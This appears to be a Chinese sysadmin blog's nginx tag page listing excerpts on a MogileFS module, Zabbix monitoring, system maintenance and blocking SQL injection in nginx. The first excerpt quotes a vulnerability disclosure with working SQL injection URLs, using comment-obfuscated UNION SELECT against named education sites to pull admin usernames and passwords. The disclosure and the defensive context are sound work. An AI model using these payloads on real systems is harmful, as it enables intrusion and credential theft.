漏洞编号:WooYun-2012-04939 详细说明: 因其中简单过滤括号和空格,导致可以绕过过滤进行注入。比如随便在教育厅主页打开几个网站测试。 主站:http://gov.e21.cn/school_show.php?college_id=96+/*!and*/+1=2+/*!uNioN*/+/*!seLecT*/+1,user_name,3,4,user_pwd,6,7,8,9,10,11,12,13,14+/*!from*/+admin 高中课改网:http://gzkg.e21.cn/content.php?id=1253+/*!aND*/1=2+/*!uNion*/+/*!sel… 继续阅读 没想到wooyun.org上榜被抓sql inject
标签: nginx
nginx
尝试mogilefs for nginx的模块
模块有个简单的文档 http://www.grid.net.ru/nginx/mogilefs.en.html 安装 #wget http://www.grid.net.ru/nginx/download/nginx_mogilefs_module-1.0.4.tar.gz #tar zxvf nginx_mogilefs_module-1.0.4.tar.gz #cd nginx-1.0.14 #./configure –prefix=/data/app/nginx –add-module=../nginx_mogilefs_module-1.0.4/ –with-debug #make &… 继续阅读 尝试mogilefs for nginx的模块
近幾日系統維護小節
近一段時間一直在做全省高一階段的綜合素質評價系統的運維,短時間內用戶幷發很高操作很多流量也比較大,在維護過程中一直跌跌撞撞遇到很多問題,目前已經告一段落。問題很多,收穫也很多,我想有必要系統的總結一下。 整體系統狀況如下: 主要功能是全省高中學生的網上素質評價,大約40w用戶,每個班內學生需要互評,以每個班60人計算,最大的互評表規模60*40w=2400w的規模。評價時間需要在15天完成,評價採用開放式,部份在學校機房集中填報,有條件也可在家自由填報,學生評價之後的修改沒有限制,個班老師需要網上對所有評價進行審核確認。 系統開發環境php+oracle,在前端採用一台千兆負載均衡設備,後端採… 继续阅读 近幾日系統維護小節
用nginx做一点sql-inject的临时处理
这几天sql-inject的量有些大,每天snort记录的扫描探测都有几万条。特别是有一些小分网站脚本陈旧,这方面的处理存在很大漏洞,的确存在一些sql-inject的漏洞,有些探测已经得到了web应用的用户管理表数据。 脚本众多,要协调程序部门修改是一个过程,很头疼。只好临时在nginx上做了一些URL判断,把符合规则的一些url访问导向到临时页面中。 nginx中内置的变量函数可以达到这个目的: nginx.conf# 定义一个错误吗和相应页面 error_page 519  … 继续阅读 用nginx做一点sql-inject的临时处理
在zabbix上监控nginx进程
由于大部分web服务器的apache都更换为了nginx,zabbix中以前http进程监控也需要调整了。 在zabbix中可以自定义监控变量,通过自己写的bash脚本来抓取相关信息返回给zabbix server,这里我们需要在运行zabbix agent的服务器上编辑/etc/zabbix/zabbix_agentd.conf,增加下行:UserParameter=nginx.connects,/data/shells/nginx_status.sh connections 其中nginx.connects是定义的zabbix agent变量,/data/shells/nginx_stat… 继续阅读 在zabbix上监控nginx进程